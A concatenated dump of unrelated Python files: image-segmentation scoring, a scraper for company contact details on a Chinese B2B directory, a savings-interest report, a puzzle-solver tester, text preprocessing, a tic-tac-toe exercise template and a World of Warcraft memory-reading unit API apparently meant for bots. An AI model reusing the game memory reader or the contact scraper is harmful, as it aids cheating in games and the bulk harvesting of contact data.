ax.axis('image')\n# ax.set_xticks([])\n# ax.set_yticks([])\n# plt.show()\n #show countor ion source image \n source_im = data_im[:, :,slice_,i]\n if fixed: \n source_im = source_im[rect[0]-def1_1:rect[1]+def1_2, rect[2]-def2_1:rect[3]+def2_2]\n source_im = source_im.astype('float32')\n# source_im = source_im[rect[0]-50:rect[1]+50, rect[2]-50:rect[3]+50]\n z = (plt.contour(im2, [ 0.8]))\n# fig3 = plt.figure()\n# ax = fig3.add_subplot(1, 1, 1)\n# ax.set_xticks([])\n# ax.set_yticks([])\n plt.imshow(source_im, cmap=plt.cm.gray)#interpolation='nearest',\n # If you want to plot the controus yourself, you can do it like this...\n index = 0 # look at the first contour\n line = z.collections[index].get_paths()[0].vertices\n \n line = np.copy(line) # make a copy so manipulations don't change the original contour\n line[:,0] += 50.0 # shift it to the right (as an example of something we can do only easily with the data for the contour line\n line[:,1] +=50.0\n mytck,myu=itp.splprep([line[:,0],line[:,1]])\n xnew,ynew= itp.splev(np.linspace(0,1,22),mytck)\n# plt.plot(xnew[:],ynew[:],'b-')\n #plt.plot(line[:,0], line[:,1], 'r-')\n if fdmname2.endswith('.npy'):\n fdmname2 = fdmname2[:-4]\n fdmname2 = fdmname2[105:]\n plt.savefig(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+'/'+fdmname2 +'c.png', bbox_inches='tight')\n plt.show()\n# \n \n \n \n \n plt.figure()\n \n plt.imshow(im2, 'gray', interpolation='none', alpha=0.8)\n plt.imshow(im_target, 'gray', interpolation='none', alpha=0.4)\n if fdmname2.endswith('.npy'):\n fdmname2 = fdmname2[:-4]\n fdmname2 = fdmname2[105:]\n str2 = \"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+'/'+fdmname2 + '_10.png'\n print(str2)\n \n plt.savefig(str2, bbox_inches='tight')\n \n plt.figure(2)\n plt.imshow(im_target, 'gray')\n \n plt.savefig(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+'/'+fdmname2 + '_10_gt.png', bbox_inches='tight')\n \n plt.figure(3)\n plt.imshow(im2, 'gray')\n \n plt.savefig(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+'/'+fdmname2 + '_10_re.png', bbox_inches='tight')\n #plt.show()\n \n# for i in range (12):\n# \n# print(i)\n# dispm=DM[i,:,:,:]\n# dispm = np.expand_dims(dispm,0)\n# im_warp3 =STN(im_mov, dispm)\n# im3=sess.run(im_warp3, {im_mov:im3, dispM : dispm})\n# im4 = np.squeeze(im3)\n# \n #plt.imshow(im2, cmap = 'gray' ) \n# im = np.squeeze(im) \n file.write(str( np.sum(im2[im_target==1])*2.0 / (np.sum(im2)+ np.sum(im_target)))+\"\\r\\n\")\n print( np.sum(im2[im_target>=1])*2.0 / (np.sum(im2)+ np.sum(im_target)))\n \n \n cnt =contours[0]\n contours_target= measure.find_contours(im_target,0.8)\n cnt2 =contours_target[0]\n \n ax.plot(cnt[:, 1], cnt[:, 0], linewidth=2)\n ax.plot(cnt2[:, 1], cnt2[:, 0], linewidth=2)\n #plt.show()\n \n print(directed_hausdorff(contours[0],contours_target[0]))\n# file.write(str( np.sum(im[im_target==1])*2.0 / (np.sum(im)+ np.sum(im_target)))+\"\\r\\n\")\n# print(scip np.sum(im[im_target>=1])*2.0 / (np.sum(im)+ np.sum(im_target)))\n \n \n \n else:\n continue\n \n file.close()\n \n# print( np.sum(im3[im_target==0])*2.0 / (np.sum(im3)+ np.sum(im_target) )) \n","sub_path":"Dice.py","file_name":"Dice.py","file_ext":"py","file_size_in_byte":15687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"546495037","text":"from bs4 import BeautifulSoup\nimport re\n\nclass Parser(object):\n def parseToGetRegionUrls(self, content, flag):\n soupObj = BeautifulSoup(content, \"html.parser\");\n allLinks = None;\n\n if(flag == \"province\"):\n allLinks = soupObj.find(\"div\", {\"class\": \"topprovince\"}).find_all(\"a\");\n if(flag == \"city\"):\n allLinks = soupObj.find(\"dl\", {\"id\": \"clist\"}).find_all(\"a\");\n\n allRegionUrl = set();\n for link in allLinks:\n url = link.get(\"href\");\n if(url is not None):\n allRegionUrl.add(url);\n return allRegionUrl;\n\n\n def parseToGetCategoryUrl(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n allLinks = soupObj.find(\"div\", {\"class\": \"main\"}).find_all(\"a\");\n\n allCategoryUrls = set();\n for link in allLinks:\n url = link.get(\"href\");\n if(url is not None):\n allCategoryUrls.add(url);\n\n return allCategoryUrls;\n\n def parseToGetBriefPageUrls(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n try:\n allLinks = soupObj.find(\"div\", {\"class\": \"page_tag\"}).find_all(\"a\");\n allNextPageUrls = set();\n for link in allLinks:\n url = link.get(\"href\");\n if(url is not None):\n allNextPageUrls.add(url);\n return allNextPageUrls;\n\n except:\n return None;\n\n def parseToGetDeatilPageUrls(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n patGongsi = re.compile(r\"http:\\/\\/b2b\\.huangye88\\.com\\/gongsi\\/\\d*\\/$\");\n patQiye = re.compile(r\"http:\\/\\/b2b\\.huangye88\\.com\\/qiye\\d*\\/$\");\n links = soupObj.find(\"div\", {\"class\": \"mach_list2\"}).find(\"form\", {\"id\": \"jubao\"}).find_all(\"a\");\n detailPageUrls = set();\n\n for link in links:\n url = link.get(\"href\");\n if(url is not None and (re.match(patGongsi, url) or re.match(patQiye, url))):\n detailPageUrls.add(url);\n return detailPageUrls;\n\n def parseToGetCompanyName(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n text = soupObj.find(\"h1\", {\"class\": \"big\"}).get_text();\n return text;\n\n def parseToGetCompanyDetails(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n text = soupObj.find(\"ul\", {\"class\": \"con-txt\"}).get_text();\n return text;\n\n def parseToGetCompanyContact(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n text = soupObj.find(\"ul\", {\"class\": \"con-txt\"}).get_text();\n return text;\n\n\n # 文件路径相关\n def parseToGetCatalogueName(self, content):\n soupObj = BeautifulSoup(content, \"html.parser\");\n nameStr = soupObj.find(\"div\", {\"class\": \"subNav\"}).get_text();\n nameList = nameStr.split(\" \");\n\n return nameList[-2];\n\n","sub_path":"HuangYe/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"437210084","text":"import pandas as pd\nimport numpy as np\nimport xlsxwriter\nfrom pandas.tseries.offsets import MonthEnd\nimport datetime\nfrom datetime import datetime, timedelta\nimport calendar\n\n\ndef monthdelta(d1, d2):\n \"\"\"\n Returns the difference of two datetimes in months\n :param datetime d1: the earlier date\n :param datetime d2: the later date\n :return: the month difference\n :rtype: int\n \"\"\"\n delta = 0\n while True:\n mdays = calendar.monthrange(d1.year, d1.month)[1]\n d1 += timedelta(days=mdays)\n if d1 <= d2:\n delta += 1\n else:\n break\n return delta\n\n\nclass Transaksi:\n \"\"\"\n Transaksi holds the information of a transaction which conveys its amount and its transaction type\n \"\"\"\n def __init__(self, jumlah, tipe):\n \"\"\"\n Initializes the Transaksi object\n :param float jumlah: the amount of transaction\n :param str tipe: the type of transaction\n \"\"\"\n self.jumlah = jumlah\n self.tipe = tipe\n\n def __repr__(self):\n \"\"\"\n To String method\n :return: the string representation of Transaksi\n \"\"\"\n return \"({} sejumlah Rp{})\".format(self.tipe, self.jumlah)\n\n\nclass EmployeeBalance:\n \"\"\"\n Keeps track of the employee's balance throughout the date\n \"\"\"\n INTEREST = 0.012 # the interest rate applied to daily average balance at the end of each month\n\n def __init__(self):\n \"\"\"\n Initializes EmployeeBalance\n \"\"\"\n self.balance = 0\n self.currDate = None\n\n self.__startDate = None\n self.__dailyBalance = 0\n self.__balanceAccumulation = 0\n\n def update(self, date, transaction, amount):\n \"\"\"\n Updates the current balance given the transaction type, amount, and date\n :param datetime date: date of the transaction\n :param str transaction: the type of transaction\n :param float amount: the amount of transaction\n :return: the current employee balance\n :rtype: float\n \"\"\"\n if self.currDate is None or self.__startDate is None:\n self.__startDate = pd.to_datetime(date, format=\"%Y%m%d\")\n self.currDate = pd.to_datetime(date, format=\"%Y%m%d\")\n if date.month != self.currDate.month: # edge case if a month is skipped\n monthly_interest = self.update_monthly(date)\n print(\"monthly interest added = Rp{}\".format(monthly_interest))\n\n if date != self.currDate:\n time_range = date - self.currDate\n # print(time_range.days)\n # print(date, end = '')\n self.__balanceAccumulation += self.balance * time_range.days\n self.currDate = pd.to_datetime(date, format=\"%Y%m%d\")\n if transaction == 'Tabungan':\n self.balance += amount\n elif transaction == 'Tarikan ':\n self.balance -= amount\n # print('balance: {}'.format(self.balance))\n return self.balance\n\n def update_monthly(self, date):\n \"\"\"\n Gets called when there is a change in month\n :param datetime date: the current transaction's date\n :return: the monthly added interest\n :rtype: float\n \"\"\"\n end_of_month = calendar.monthrange(self.currDate.year, self.currDate.month)[1]\n end_of_month = datetime(self.currDate.year, self.currDate.month, end_of_month)\n time_range = end_of_month - self.currDate\n self.__balanceAccumulation += self.balance * time_range.days\n time_difference = end_of_month.day\n if time_difference is not 0:\n monthly_interest = self.__balanceAccumulation / time_difference * self.INTEREST\n else:\n monthly_interest = 0\n month_difference = monthdelta(self.__startDate, date) + 1\n self.balance += monthly_interest * month_difference\n self.__balanceAccumulation = 0\n self.__startDate = pd.to_datetime(date, format=\"%Y%m%d\") + MonthEnd(1)\n self.currDate = end_of_month\n return monthly_interest\n\n\ndef load_file(data_frame):\n \"\"\"\n Loads the excel file into cleaned up data structure that groups transactions by NIK and transaction date\n :param dataFrame data_frame: the data frame containing the excel document\n :return: the cleaned up data structure version of the excel file\n :rtype: Map>>\n \"\"\"\n\n nik_dict = dict() # dictionary that contains all the transaction information\n for index, row, in data_frame.iterrows():\n if row['NIK'] not in nik_dict.keys():\n nik_dict[int(row['NIK'])] = {row['Tanggal']: []}\n elif row['Tanggal'] not in nik_dict[int(row['NIK'])].keys():\n nik_dict[int(row['NIK'])][row['Tanggal']] = []\n curr_transaksi = nik_dict[int(row['NIK'])][row['Tanggal']]\n jumlah = abs(row['Masuk'] + row['Keluar']) # merge these columns to one\n curr_transaksi.append(Transaksi(jumlah, row['Transaksi']))\n print(nik_dict)\n\n return nik_dict\n\n\ndef generate_report(nik_dict):\n \"\"\"\n Generates the report that also tracks employee balances for each employee\n :param Map>> nik_dict: the data frame as a data structure\n \"\"\"\n workbook = xlsxwriter.Workbook('nik_report.xlsx')\n date_format = workbook.add_format({'num_format': 'dd/mm/yy'})\n money_format = workbook.add_format({'num_format': 'Rp#,##0.00'})\n\n for nik in nik_dict.keys():\n print(\"\\n\\nNIK {}\".format(nik))\n employee_balance = EmployeeBalance()\n curr_sheet = workbook.add_worksheet(\"NIK {}\".format(nik))\n curr_sheet.set_column(1, 1, 12)\n curr_sheet.set_column(3, 3, 12)\n curr_sheet.write(0, 0, \"Tanggal\")\n curr_sheet.write(0, 1, \"Jumlah Transaksi\")\n curr_sheet.write(0, 2, \"Tipe Transaksi\")\n curr_sheet.write(0, 3, \"Saldo\")\n row = 0\n col = 0\n for date in nik_dict[nik].keys():\n item_list = nik_dict[nik][date]\n # print(item)\n for item in item_list:\n # Filters the types of transactions to be written\n if item.tipe == \"Tabungan\" or item.tipe == \"Tarikan \":\n row += 1\n curr_sheet.write(row, col, date, date_format)\n curr_sheet.write(row, col + 1, item.jumlah, money_format)\n curr_sheet.write(row, col + 2, item.tipe)\n balance = employee_balance.update(date, item.tipe, item.jumlah)\n curr_sheet.write(row, col + 3, balance, money_format)\n\n workbook.close()\n\n\nif __name__ == \"__main__\":\n df = pd.read_excel('toBeParsed.xlsx', sheet_name='Kas')\n df = df[np.isfinite(df['NIK'])] # dropping nonexistent NIKs\n df['Masuk'].fillna(0, inplace=True) # replace all NaN with 0\n df['Keluar'].fillna(0, inplace=True) # replace all NaN with 0\n\n nik_dict = load_file(df)\n # print(nik_dict)\n\n generate_report(nik_dict)\n","sub_path":"transaction_parser.py","file_name":"transaction_parser.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"125743184","text":"import numpy as np\nimport queue\nfrom collections import deque\nfrom tilepuzzle import *\nfrom Assignment1 import *\nimport time\n\noutpath = \"/Users/Ben/Desktop/Tile_Results/\"\noutname = \"results.txt\"\n\nBFS_moves_out=\"BFS_moves.txt\"\nBFS_times_out=\"BFS_times.txt\"\naStar_moves_out=\"aStar_moves.txt\"\naStar_times_out=\"aStar_times.txt\"\nmanhattan_moves_out=\"manhattan_moves.txt\"\nmanhattan_times_out=\"manhattan_times.txt\"\n\ndef tester(num_iterations):\n\n print(\"hello\")\n BFS_moves = []\n BFS_times = []\n aStar_moves = []\n aStar_times = []\n manhattan_moves = []\n manhattan_times = []\n\n output = open(outpath+outname,'w')\n\n BFS_moves_write = open(outpath+BFS_moves_out,'w')\n BFS_times_write = open(outpath+BFS_times_out,'w')\n\n aStar_moves_write = open(outpath+aStar_moves_out,'w')\n aStar_times_write = open(outpath+aStar_times_out,'w')\n\n manhattan_moves_write = open(outpath+manhattan_moves_out,'w')\n manhattan_times_write = open(outpath+manhattan_times_out,'w')\n\n output.write(\"test results:\"+\"\\n\")\n\n for i in range(num_iterations):\n start_time = time.time()\n curr_BFS = breadthFirst(100,i)\n\n if curr_BFS == \"FAIL\":\n print(\"current test ran into a fail. stopping test run.\")\n return\n\n BFS_moves_write.write(str(curr_BFS)+\"\\n\")\n BFS_moves.append(curr_BFS)\n\n BFS_times_write.write(str(time.time()-start_time)+\"\\n\")\n BFS_times.append(time.time()-start_time)\n BFS_moves_write.close\n BFS_times_write.close\n\n for i in range(num_iterations):\n start_time = time.time()\n curr_aStar = aStar_One(100,i)\n\n if curr_aStar == \"FAIL\":\n print(\"current test ran into a fail. stopping test run.\")\n return\n\n aStar_moves_write.write(str(curr_aStar)+\"\\n\")\n aStar_moves.append(curr_aStar)\n\n aStar_times_write.write(str(time.time()-start_time)+\"\\n\")\n aStar_times.append(time.time()-start_time)\n aStar_moves_write.close\n aStar_times_write.close\n\n for i in range(num_iterations):\n start_time = time.time()\n curr_manhattan = aStar_Manhattan(100,i)\n\n if curr_manhattan == \"FAIL\":\n print(\"current test ran into a fail. stopping test run.\")\n return\n\n manhattan_moves_write.write(str(curr_manhattan)+\"\\n\")\n manhattan_moves.append(curr_manhattan)\n\n manhattan_times_write.write(str(time.time()-start_time)+\"\\n\")\n manhattan_times.append(time.time()-start_time)\n manhattan_moves_write.close\n manhattan_times_write.close\n\n BFS_m_avg = sum(BFS_moves)/len(BFS_moves)\n BFS_t_avg = sum(BFS_times)/len(BFS_times)\n output.write(\"BFS moves average: \"+str(BFS_m_avg)+\"\\n\")\n output.write(\"BFS time average: \"+str(BFS_t_avg)+\"\\n\")\n output.write(\"----------\"+\"\\n\")\n\n aStar_m_avg = sum(aStar_moves)/len(aStar_moves)\n aStar_t_avg = sum(aStar_times)/len(aStar_times)\n output.write(\"aStar moves average: \"+str(aStar_m_avg)+\"\\n\")\n output.write(\"aStar time average: \"+str(aStar_t_avg)+\"\\n\")\n output.write(\"----------\"+\"\\n\")\n\n manhattan_m_avg = sum(manhattan_moves)/len(manhattan_moves)\n manhattan_t_avg = sum(manhattan_times)/len(manhattan_times)\n output.write(\"manhattan moves average: \"+str(manhattan_m_avg)+\"\\n\")\n output.write(\"manhattan time average: \"+str(manhattan_t_avg)+\"\\n\")\n output.close\n\ntester(100)\n","sub_path":"Assignment_1/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"524822823","text":"import numpy as np\nfrom nltk.tokenize.treebank import TreebankWordTokenizer\n\nfrom config import (\n REMOVE_DICT,\n ISOLATE_DICT,\n)\n\nTOKENIZER = TreebankWordTokenizer()\n\n\ndef handle_symbols(x):\n x = x.translate(REMOVE_DICT)\n x = x.translate(ISOLATE_DICT)\n return x\n\n\ndef handle_contractions(x):\n x = TOKENIZER.tokenize(x)\n return x\n\n\ndef fix_quote(x):\n x = [x_[1:] if x_.startswith(\"'\") else x_ for x_ in x]\n x = ' '.join(x)\n return x\n\n\ndef preprocess(x):\n # 1. Remove all symbols in the corpus that do not appear in the embeddings.\n x = handle_symbols(x)\n # 2. Handle contractions using the TreebankTokenizer.\n x = handle_contractions(x)\n # 3. Remove the apostrophe symbol at the beginning of the token words.\n x = fix_quote(x)\n return x\n\n\ndef build_matrix(word_index, glove_model, max_featrs):\n embedding_matrix = np.zeros((max_featrs + 1, 300))\n unknown_words = []\n\n for word, i in word_index.items():\n if i <= max_featrs:\n try:\n embedding_matrix[i] = glove_model[word]\n except KeyError:\n try:\n embedding_matrix[i] = glove_model[word.lower()]\n except KeyError:\n try:\n embedding_matrix[i] = glove_model[word.title()]\n except KeyError:\n unknown_words.append(word)\n return embedding_matrix, unknown_words\n","sub_path":"Lab1_Operationalizing_Pytorch_with_Mlflow/Team2/data_loader/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"263559869","text":"from pygame.locals import *\r\nfrom algorithm.tictactoeAlgorithm import *\r\n\r\n# initialize global variables\r\nXO = 'x' # <-- Variable to know which player are playing\r\nwinner = None # <-- Variable to know who is the winner \r\ndraw = False # <-- Variable to know if the game is a draw\r\nwidth = 400 # <-- Variable to know set the width of the map\r\nheight = 400 # <-- Variable to know set the height of the map\r\n\r\n\r\n# TTT ==> map\r\n# posy and posx are the position on x and y of the cursor\r\n\r\ndef drawXO(row, col):\r\n global TTT, XO, posy, posx\r\n\r\n # __________________________________________________________________________________\r\n # Figure out the position in the axe of row.\r\n # Complete the ellipsis below. If the \"row\" is equal to the number \"1\" so \"posx = 30\".\r\n # if ...\r\n # ...\r\n # Complete the ellipsis below. Else if \"row\" is equal to the number \"2\" so \"posx = width / 3 + 30\".\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else if \"row\" is equal to the number \"3\" so \"posx = width / 3 * 2 + 30\".\r\n # elif ...\r\n # ...\r\n\r\n # __________________________________________________________________________________\r\n # Figure out the position in the axe of col.\r\n # Complete the ellipsis below. If the \"col\" is equal to the number \"1\" so \"posy = 30\".\r\n # if ...\r\n # ...\r\n # Complete the ellipsis below. Else if \"col\" is equal to the number \"2\" so \"posy = height / 3 + 30\".\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else if \"col\" is equal to the number \"3\" so \"posy = height / 3 * 2 + 30\".\r\n # elif ...\r\n # ...\r\n\r\n TTT[row - 1][col - 1] = XO # We put the varaible at the place coordinates \"row\" and \"col\" on the map\r\n # if the player \"X\" or \"O\" finish to play we change the content of the variable XO by the value \"x\" or \"o\"\r\n if XO == 'x':\r\n screen.blit(x_img, (posy, posx))\r\n XO = 'o'\r\n else:\r\n screen.blit(o_img, (posy, posx))\r\n XO = 'x'\r\n pg.display.update() # we update the posting\r\n\r\n\r\ndef userClick(winner, draw):\r\n # get coordinates of mouse click, through pygame\r\n x, y = pg.mouse.get_pos()\r\n\r\n # get column of mouse click (1-3) (3 number the case on the axe x them number the axe y )\r\n # __________________________________________________________________________________\r\n # Figure out the position of the mouse on the map, axe of x (col).\r\n # Complete the ellipsis below. If the variable \"x\" is inferior to the number \"width / 3\" so \"col = 1\".\r\n # if ...\r\n # ...\r\n # Complete the ellipsis below. Else if the variable \"x\" is inferior to the number \"width / 3 * 2\" so \"col = 2\"..\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else if the variable \"x\" is inferior to the variable \"width\" so \"col = 3\".\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else \"x\" is not matching with previous check, so \"col\" variable will get the value \"none\".\r\n # else:\r\n # ...\r\n\r\n # __________________________________________________________________________________\r\n # Figure out the position of the mouse on the map, axe of y (row).\r\n # Complete the ellipsis below. If the variable \"y\" is inferior to the number \"height / 3\" so \"row = 1\".\r\n # if ...\r\n # ...\r\n # Complete the ellipsis below. Else if the variable \"y\" is inferior to the number \"height / 3 * 2\" so \"row = 2\"..\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else if the variable \"y\" is inferior to the variable \"height\" so \"row = 3\".\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else \"y\" is not matching with previous check, so \"row\" variable will get the value \"none\".\r\n # else:\r\n # ...\r\n # get row of mouse click (1-3)\r\n\r\n if row and col and TTT[row - 1][col - 1] is None:\r\n global XO\r\n # draw the x or o on screen\r\n drawXO(row, col)\r\n return check_win(TTT, winner, draw, XO)\r\n\r\n\r\ndef reset_game():\r\n global winner, XO, draw\r\n time.sleep(2) # sleep to make the program in pause, for 2 seconds\r\n\r\n # Complete the ellipsis below. If we reset the game what should be the value of XO variable ?\r\n # XO = ..\r\n\r\n # Complete the ellipsis below. If we reset the game what should be the value of XO draw ?\r\n # draw = ...\r\n\r\n game_opening(draw, winner, XO)\r\n\r\n # Complete the ellipsis below. If we reset the game what should be the value of XO variable ?\r\n # winner = ...\r\n\r\n return [[None] * 3, [None] * 3, [None] * 3] # We reset the map as the beginning.\r\n\r\n\r\ngame_opening(draw, winner, XO)\r\n\r\n# run the game loop forever\r\nwhile True:\r\n for event in pg.event.get():\r\n # We check if the type of the event is equal to QUIT, if the user want to close the windows\r\n if event.type == QUIT:\r\n pg.quit()\r\n sys.exit()\r\n # We check ig the type of the event is equal to MOUSEBUTTONDOWN, means the user has presse on the mouse, and\r\n # we check what we have to do in function of the position of the mouse.\r\n elif event.type == MOUSEBUTTONDOWN:\r\n # the user clicked; place an X or O\r\n res = userClick(winner, draw)\r\n winner = res[0]\r\n draw = res[1]\r\n TTT = res[2]\r\n # In the case the variable draw or winner is not undefine, means theg game end up in this case we reset the game\r\n if winner or draw:\r\n TTT = reset_game()\r\n pg.display.update()\r\n CLOCK.tick(fps)\r\n","sub_path":"src/tictactoe_game_to_complete.py","file_name":"tictactoe_game_to_complete.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"356731228","text":"import string\nfrom wowapi.objects.object import Object, enforce_validity\nfrom wowapi.spell import Spell, Aura\nfrom wowapi.position import Position\n\nclass Unit(Object):\n\tdef __init__(self, *args, **kwargs):\n\t\tObject.__init__(self, *args, **kwargs)\n\t\t\n\tdef __repr__(self):\n\t\treturn \"\" % (self.name, hex(self.base))\n\t\t\n\t@property\n\t@enforce_validity\n\tdef position(self):\n\t\treturn Position(\n\t\t\tx=self.get_base_float('UNIT_XLOCATION'),\n\t\t\ty=self.get_base_float('UNIT_YLOCATION'),\n\t\t\tz=self.get_base_float('UNIT_ZLOCATION')\n\t\t)\n\t\n\t@property\n\tdef x(self):\n\t\treturn self.position.x\n\t\t\n\t@property\n\tdef y(self):\n\t\treturn self.position.y\n\t\t\n\t@property\n\tdef z(self):\n\t\treturn self.position.z\n\t\t\n\t@property\n\t@enforce_validity\n\tdef facing(self):\n\t\treturn (\n\t\t\tself.get_base_float('UNIT_FACING_HORIZONTAL'),\n\t\t\tself.get_base_float('UNIT_FACING_VERTICAL')\n\t\t)\n\t\t\n\t@property\n\t@enforce_validity\n\tdef movement_flags(self):\n\t\treturn self.get_base_int('UNIT_MOVEMENTFLAGS')\n\t\t\n\tdef has_movement_flag(self, flag):\n\t\treturn bool(self.wow.constants['MOVEMENTFLAG_%s' % string.upper(flag)] & self.movement_flags)\n\t\t\n\t@property\n\t@enforce_validity\n\tdef speed(self):\n\t\treturn self.get_base_float('UNIT_RUNSPEED_CURRENT')\n\t\t\n\t@property\n\t@enforce_validity\n\tdef walk_speed(self):\n\t\treturn self.get_base_float('UNIT_RUNSPEED_WALK')\n\t\t\n\t@property\n\t@enforce_validity\n\tdef max_speed(self):\n\t\treturn self.get_base_float('UNIT_RUNSPEED_MAX')\n\t\n\t@property\n\t@enforce_validity\n\tdef back_speed(self):\n\t\treturn self.get_base_float('UNIT_RUNSPEED_BACK')\n\t\t\n\t@property\n\t@enforce_validity\n\tdef max_airspeed(self):\n\t\treturn self.get_base_float('UNIT_AIRSPEED_MAX')\n\t\t\n\t@property\n\t@enforce_validity\n\tdef casting(self):\n\t\ttocast = self.get_base_int('UNIT_SPELL_TOCAST')\n\t\tcasting = self.get_base_int('UNIT_SPELL_CASTING')\n\t\ttarget = (\n\t\t\tself.get_base_int('UNIT_SPELL_TARGETGUID_LOW'),\n\t\t\tself.get_base_int('UNIT_SPELL_TARGETGUID_HIGH')\n\t\t)\n\t\tstart = self.get_base_int('UNIT_SPELL_TIMESTART')\n\t\tend = self.get_base_int('UNIT_SPELL_TIMEEND')\n\t\t\n\t\tif tocast or casting:\n\t\t\treturn Spell(casting) if casting else Spell(tocast), target, start, end\n\t\telse:\n\t\t\treturn None, None, None, None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef channeling(self):\n\t\tchanneling = self.get_base_int('UNIT_SPELL_CHANNELING')\n\t\tstart = self.get_base_int('UNIT_SPELL_CHANNELTIMESTART')\n\t\tend = self.get_base_int('UNIT_SPELL_CHANNELTIMEEND')\n\t\t\n\t\tif channeling:\n\t\t\treturn Spell(channeling), start, end\n\t\telse:\n\t\t\treturn None, None, None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef selection_flags(self):\n\t\treturn self.get_base_int('UNIT_SELECTIONFLAGS')\n\t\t\n\t@property\n\tdef is_selected(self):\n\t\treturn bool((1 << 12) & self.selection_flags)\n\t\t\n\t@property\n\tdef is_focused(self):\n\t\treturn bool((1 << 13) & self.selection_flags)\n\t\t\n\t@property\n\t@enforce_validity\n\tdef auras(self):\n\t\tvalid_auras = self.get_base_int('UNIT_AURAS_VALIDCOUNT')\n\t\tif valid_auras == 0xFFFFFFFF:\n\t\t\tvalid_auras = self.get_base_int('UNIT_AURAS_OVERFLOWVALIDCOUNT')\n\t\tif valid_auras <= 0 or valid_auras > 56:\n\t\t\treturn [] # not a valid aura count\n\n\t\tauras_base = self.base + self.wow.offsets['UNIT_AURAS_START']\n\t\tif valid_auras > 16: # aura overflow\n\t\t\tauras_base = self.base + self.wow.offsets['UNIT_AURAS_OVERFLOWPTR1']\n\t\t\tif not auras_base:\n\t\t\t\treturn [] # error finding aura overflow ptr\n\n\t\tauras = {}\n\t\tfor i in range(0, valid_auras):\n\t\t\taura_base = auras_base + (i * 0x18)\n\t\t\tspell_id = self.wow.vm[aura_base + self.wow.offsets['AURA_ENTRYID']]\n\t\t\tif spell_id:\n\t\t\t\tauras[spell_id] = Aura(\n\t\t\t\t\tspell=Spell(spell_id),\n\t\t\t\t\tguid=(self.wow.vm[aura_base + self.wow.offsets['AURA_GUID']], self.wow.vm[aura_base + self.wow.offsets['AURA_GUID'] + 0x4]),\n\t\t\t\t\tbytes=self.wow.vm[aura_base + self.wow.offsets['AURA_BYTES']],\n\t\t\t\t\tduration=self.wow.vm[aura_base + self.wow.offsets['AURA_DURATION']],\n\t\t\t\t\texpiration=self.wow.vm[aura_base + self.wow.offsets['AURA_EXPIRATION']]\n\t\t\t\t)\n\t\treturn auras\n\n\t@property\n\t@enforce_validity\n\tdef name(self):\n\t\tname_base = self.get_base_int('UNIT_NAME_BASE')\n\t\tif not name_base:\n\t\t\treturn None\n\t\t\t\n\t\tname_ptr = self.wow.vm[name_base + self.wow.offsets['UNIT_NAME_PTR']]\n\t\tname = self.wow.vm.read_string(name_ptr)\n\t\treturn name if name else None\n\t\t\n\t@property\n\t@enforce_validity\n\tdef description(self):\n\t\tname_base = self.get_base_int('UNIT_NAME_BASE')\n\t\tif not name_base:\n\t\t\treturn None\n\t\t\t\n\t\tdesc_ptr = self.wow.vm[name_base + self.wow.offsets['UNIT_DESC_PTR']]\n\t\tdesc = self.wow.vm.read_string(desc_ptr)\n\t\treturn desc if desc else None\n\t\t\n\t@property\n\t@enforce_validity\n\tdef pet(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_CHARM')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn self.wow.objects[guid]\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef summon(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_SUMMON')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn self.wow.objects[guid]\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef charmed_by(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_CHARMEDBY')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn self.wow.objects[guid]\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef summoned_by(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_SUMMONEDBY')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn self.wow.objects[guid]\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef created_by(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_CREATEDBY')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn self.wow.objects[guid]\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef target(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_TARGET')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn self.wow.objects[guid]\n\t\telse:\n\t\t\treturn 